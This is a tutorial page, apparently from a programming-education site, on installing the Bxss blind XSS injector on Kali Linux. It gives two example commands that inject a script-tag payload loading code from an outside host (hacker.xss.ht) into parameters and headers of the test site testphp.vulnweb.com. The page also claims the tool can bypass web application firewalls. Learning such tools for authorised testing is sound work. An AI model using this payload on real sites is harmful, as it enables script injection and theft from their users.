Reconspider - Most Advanced Open Source Intelligence (OSINT) Framework

Drupwn - Drupal Enumeration Tool and Security Scanner in Kali Linux

Terra - OSINT Tool On Instagram

XERXES – Penetration Testing Tool using Kali Linux

Pompem - Exploit and Vulnerability Finder

J-dorker - Website List grabber from Bing

NXcrypt - Python Backdoor Framework

Longtongue - Customized Password/Passphrase List Inputting Target Info

Lockdoor Framework - Penetration Testing Framework With Cyber Security Resources

HackerTarget ToolKit - Tools To Help Organizations With Attack Surface Discovery

Fast Google Dorks Scan - Automatic Dork Hacking Tool

Kaboom - Automatic Pentest Bash Script

Juumla - Tool Designed To Identify And Scan For Version, Config Files In The CMS Joomla

Ppmap - A Scanner or Exploitation Tool Written In GO

XanXSS - Simple XSS Finding Tool in Kali Linux

Vulnnr – Vulnerability Scanner and Auto Exploiter in Kali Linux

Optiva Framework - Web Application Vulnerabilities Scanner

Waybackurls - Fetch all the URLs that the Wayback Machine knows about for a domain

Detecting and Checking Rootkits with Chkrootkit and rkhunter Tool in Kali Linux

Bxss – Blind XSS Injector Tool

Last Updated : 23 Sep, 2021

Bxss tool is an automated tool that aims to test the target domain for XSS Security Flaw. Bxss tool is developed in the Python language and available on the GitHub platform. XSS is the most common vulnerability, which is identified on almost every web-based application; we only have to find an input field where you can inject your malicious JavaScript payload.

Bxss tool can inject blind XSS payloads into custom headers which can bypass the WAF on the target server. Bxss tool is very easy to set up and use. Bxss tool uses different request methods (PUT, POST, GET, OPTIONS) all at once.

Note: As Bxss is a Golang language-based tool, so you need to have a Golang environment on your system.

Installation of Bxss Tool in Kali Linux OS

Step 1: Use the following command to install the tool in your Kali Linux operating system.

git clone https://github.com/ethicalhackingplayground/bxss.git

Bxss - A Blind XSS Injector Tool

Step 2: Now use the following command to move into the directory of the tool. You have to move in the directory in order to run the tool.

cd bxss

Bxss - A Blind XSS Injector Tool

Step 3: Build the go file using the following command.

sudo go build

Bxss - A Blind XSS Injector Tool

Step 4: Now use the following command to run the tool.

./bxss -h

Bxss - A Blind XSS Injector Tool

Working with Bxss Tool in Kali Linux OS

Example 1: Blind XSS In Parameters

echo “http://testphp.vulnweb.com/search.php?test=query” | ./bxss -appendMode -payload ‘”><script src=https://hacker.xss.ht></script>’ -parameters

Bxss - A Blind XSS Injector Tool

Example 2: Blind XSS In X-Forwarded-For Header

echo “http://testphp.vulnweb.com/search.php?test=query” | ./bxss -appendMode -payload ‘”><script src=https://hacker.xss.ht></script>’ -parameters -header “GAURAV”

Bxss - A Blind XSS Injector Tool

Suggest improvement

Detecting and Checking Rootkits with Chkrootkit and rkhunter Tool in Kali Linux

GithubFind3r - Fast Command Line Repo/User/Commit Search Tool

Share your thoughts in the comments

Similar Reads

XSS-Freak - XSS Scanner Fully Written in Kali Linux

XSS-Loader - XSS Scanner and Payload Generator

FinDOM-XSS - Fast DOM Based XSS Vulnerability Scanner

PwnXSS - Automated XSS Vulnerability Scanner Tool in Kali Linux

XSSCon - Simple and Powerful XSS Scanner tool

DalFox - Parameter Analysis and XSS Scanning tool

XSpear - Powerful XSS Scanning And Parameter Analysis Tool

Damn Small XSS Scanner tool in Kali Linux

XanXSS - Simple XSS Finding Tool in Kali Linux

Xcapy - Tool For XSS Detection Suite for CTFs games

G

gauravgandal

Article Tags :